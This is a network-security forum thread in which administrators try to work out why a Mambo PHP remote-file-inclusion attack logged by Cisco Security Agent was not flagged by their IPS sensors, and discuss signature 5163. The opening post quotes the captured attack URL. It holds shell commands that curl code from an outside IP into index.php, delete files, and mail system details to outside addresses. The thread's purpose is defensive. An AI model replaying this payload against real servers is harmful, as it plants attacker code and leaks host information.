Cisco Support Community
cancel
Showing results for 
Search instead for 
Did you mean: 
Announcements

Welcome to Cisco Support Community. We would love to have your feedback.

For an introduction to the new site, click here. And see here for current known issues.

New Member

PHP exploit triggers Cisco Security Agent but NOT in Cisco IPS....why?

Does anyone know which signature this exploit should trigger with the Cisco IPS sensor? Not sure if there is one or if we have it turned off?

We see this exploit hit our Exchange Servers many times during the week.

The process 'C:\WINNT\System32\inetsrv\inetinfo.exe' (as user NT AUTHORITY\SYSTEM) received the data '/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid] =1&GLOBALS=&mosConfig_absolute_path=http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: //220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%20kkparole@yahoo.com;uname%20-a%20|%20mail%20-s%20uname_i2_66.224.194.188%20michaelroul@yahoo. com;echo|'.

1 ACCEPTED SOLUTION

Accepted Solutions
New Member

Re: PHP exploit triggers Cisco Security Agent but NOT in Cisco I

I think this might be the mambo exploit. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for info. I searched on MySDN for mambo and found sig 5163 "Mambo Site Server Administrative Password ByPass" here is an excerpt from the description: "Administrative access is gained by sending a specific url using the index2.php script and the PHPSESSID variable." This looks similar to what you pasted in. Notice "index2.php". Your IPS may not have seen this if it was over 443.

Hope this helps

M

5 REPLIES
Bronze

Re: PHP exploit triggers Cisco Security Agent but NOT in Cisco I

Remove the IPS config file from the router and copy the config after restarting it.

New Member

Re: PHP exploit triggers Cisco Security Agent but NOT in Cisco I

We have approx 40 sensors...we never see a correlation between a php exploit caught on CSA with the IPS.

Are you aware of a signature related to this exploit?

New Member

Re: PHP exploit triggers Cisco Security Agent but NOT in Cisco I

Could the php exploit be over 443? I do not believe CSA will tell you this. However, you could paste the url portion that CSA is reporting into a browser and send it to a web server over port 80 and see what the sensor does. What PHP exploit is this? Do you know if there is a Cisco sig out for this particular exploit?

M

New Member

Re: PHP exploit triggers Cisco Security Agent but NOT in Cisco I

I think this might be the mambo exploit. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for info. I searched on MySDN for mambo and found sig 5163 "Mambo Site Server Administrative Password ByPass" here is an excerpt from the description: "Administrative access is gained by sending a specific url using the index2.php script and the PHPSESSID variable." This looks similar to what you pasted in. Notice "index2.php". Your IPS may not have seen this if it was over 443.

Hope this helps

M

New Member

Re: PHP exploit triggers Cisco Security Agent but NOT in Cisco I

Interesting...the global signature for 5163 is retired/disabled globally by Cisco. This signature was published August of 2001 but IMHO should be enabled and deny packet/deny flow should be set to block this activity.

139
Views
0
Helpful
5
Replies
CreatePlease to create content